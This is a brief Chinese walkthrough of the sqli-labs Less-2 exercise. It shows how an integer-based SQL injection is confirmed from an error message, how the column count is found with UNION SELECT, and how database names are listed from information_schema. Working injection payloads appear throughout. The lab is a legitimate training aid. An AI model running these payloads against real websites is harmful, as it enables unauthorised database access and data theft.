Less-2 GET-Error based-Intiger based
图片0.png1.试探,判断注入类型
输入id=1'
根据回显
near '' LIMIT 0,1' at line 1
,判断是个数字型注入。可以成功注入的有:
2.判断字段数量
?id=-1 union select 1,2…… --+
通过增加select后面的数字个数,判断字段数量。若数量不对,返回:
图片2.png知道页面显示正常,这里字段数是3,却能显示的是第2,3字段。
图片2-2.png3.数据库
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
图3
后续部分同 Less-1,没有差别。
网友评论